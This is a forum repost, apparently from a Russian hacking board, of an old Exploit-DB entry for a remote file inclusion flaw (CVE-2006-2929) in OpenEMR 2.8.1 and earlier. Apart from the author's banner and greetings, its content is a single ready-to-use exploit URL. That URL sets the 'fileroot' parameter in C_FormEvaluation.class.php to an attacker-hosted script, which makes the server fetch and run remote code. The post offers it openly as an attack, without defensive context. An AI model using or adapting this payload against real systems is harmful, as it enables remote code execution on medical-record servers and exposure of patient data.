Exploit OpenEMR 2.8.1 - 'fileroot' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1886
Проверка EDB
  1. Пройдено
Автор
KACPER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2929
Дата публикации
2006-06-07
Код:
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  OpenEMR <= 2.8.1 Remote File Include Vulnerability
$$  Script site: http://sourceforge.net/projects/openemr/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected]   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:

http://www.site.com/[OpenEMR_path]/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-07]
 
Источник
www.exploit-db.com

Похожие темы